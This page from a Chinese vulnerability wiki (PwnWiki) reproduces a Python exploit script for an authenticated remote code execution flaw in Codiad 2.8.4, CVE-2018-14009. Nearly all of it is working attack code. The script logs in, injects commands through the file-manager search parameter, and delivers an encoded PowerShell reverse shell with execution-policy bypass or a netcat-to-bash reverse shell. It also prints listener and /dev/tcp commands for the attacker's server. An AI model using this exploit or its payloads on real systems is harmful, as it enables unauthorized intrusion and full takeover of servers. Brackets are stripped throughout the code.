免费、自由、人人可编辑的漏洞库
,
EXP
# Exploit Title: Codiad 2.8.4 - Remote Code Execution (Authenticated)
# Discovery by: WangYihang
# Vendor Homepage: http://codiad.com/
# Software Links : https://github.com/Codiad/Codiad/releases
# Tested Version: Version: 2.8.4
# CVE: CVE-2018-14009
#!/usr/bin/env python
# encoding: utf-8
import requests
import sys
import json
import base64
session = requests.Session()
def login(domain, username, password):
global session
url = domain + "/components/user/controller.php?action=authenticate"
data = {
"username": username,
"password": password,
"theme": "default",
"language": "en"
}
response = session.post(url, data=data, verify=False)
content = response.text
print("+ Login Content : %s" % (content))
if 'status":"success"' in content:
return True
def get_write_able_path(domain):
global session
url = domain + "/components/project/controller.php?action=get_current"
response = session.get(url, verify=False)
content = response.text
print("+ Path Content : %s" % (content))
json_obj = json.loads(content)
if json_obj'status' == "success":
return json_obj'data''path'
else:
return False
def base64_encode_2_bytes(host, port):
payload = '''
$client = New-Object System.Net.Sockets.TCPClient("__HOST__",__PORT__);
$stream = $client.GetStream();
byte$bytes = 0..255|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + "PS " + (pwd).Path + "> ";
$sendbyte = (text.encoding::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush();
}
$client.Close();
'''
result = ""
for i in payload.replace("__HOST__", host).replace("__PORT__", str(port)):
result += i + "\x00"
return base64.b64encode(result.encode()).decode().replace("\n", "")
def build_powershell_payload(host, port):
preffix = "powershell -ep bypass -NoLogo -NonInteractive -NoProfile -enc "
return preffix + base64_encode_2_bytes(host, port).replace("+", "%2b")
def exploit(domain, username, password, host, port, path, platform):
global session
url = domain + \
"components/filemanager/controller.php?type=1&action=search&path=%s" % (
path)
if platform.lower().startswith("win"):
# new version escapeshellarg
# escapeshellarg on windows will quote the arg with ""
# so we need to try twice
payload = '||%s||' % (build_powershell_payload(host, port))
payload = "search_string=Hacker&search_file_type=" + payload
headers = {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"}
response = session.post(url, data=payload, headers=headers, verify=False)
content = response.text
print(content)
# old version escapeshellarg
payload = '%%22||%s||' % (build_powershell_payload(host, port))
payload = "search_string=Hacker&search_file_type=" + payload
headers = {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"}
response = session.post(url, data=payload, headers=headers, verify=False)
content = response.text
print(content)
else:
# payload = '''SniperOJ%22%0A%2Fbin%2Fbash+-c+'sh+-i+%3E%26%2Fdev%2Ftcp%2F''' + host + '''%2F''' + port + '''+0%3E%261'%0Agrep+%22SniperOJ'''
payload = '"%%0Anc %s %d|/bin/bash %%23' % (host, port)
payload = "search_string=Hacker&search_file_type=" + payload
headers = {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"}
response = session.post(url, data=payload, headers=headers, verify=False)
content = response.text
print(content)
def promote_yes(hint):
print(hint)
while True:
ans = input("Y/n ").lower()
if ans == 'n':
return False
elif ans == 'y':
return True
else:
print("Incorrect input")
def main():
if len(sys.argv) != 7:
print("Usage : ")
print(" python %s URL USERNAME PASSWORD IP PORT PLATFORM" % (sys.argv0))
print(" python %s URL:PORT USERNAME PASSWORD IP PORT PLATFORM" % (sys.argv0))
print("Example : ")
print(" python %s http://localhost/ admin admin 8.8.8.8 8888 linux" % (sys.argv0))
print(" python %s http://localhost:8080/ admin admin 8.8.8.8 8888 windows" % (sys.argv0))
print("Author : ")
print(" WangYihang <email protected>")
exit(1)
domain = sys.argv1
username = sys.argv2
password = sys.argv3
host = sys.argv4
port = int(sys.argv5)
platform = sys.argv6
if platform.lower().startswith("win"):
print("+ Please execute the following command on your vps: ")
print("nc -lnvp %d" % (port))
if not promote_yes("+ Please confirm that you have done the two command above y/n"):
exit(1)
else:
print("+ Please execute the following command on your vps: ")
print("echo 'bash -c \"bash -i >/dev/tcp/%s/%d 0>&1 2>&1\"' | nc -lnvp %d" % (host, port + 1, port))
print("nc -lnvp %d" % (port + 1))
if not promote_yes("+ Please confirm that you have done the two command above y/n"):
exit(1)
print("+ Starting...")
if not login(domain, username, password):
print("- Login failed! Please check your username and password.")
exit(2)
print("+ Login success!")
print("+ Getting writeable path...")
path = get_write_able_path(domain)
if path == False:
print("+ Get current path error!")
exit(3)
print("+ Writeable Path : %s" % (path))
print("+ Sending payload...")
exploit(domain, username, password, host, port, path, platform)
print("+ Exploit finished!")
print("+ Enjoy your reverse shell!")
if __name__ == "__main__":
main()
免费、自由、人人可编辑的漏洞库--PwnWiki.com
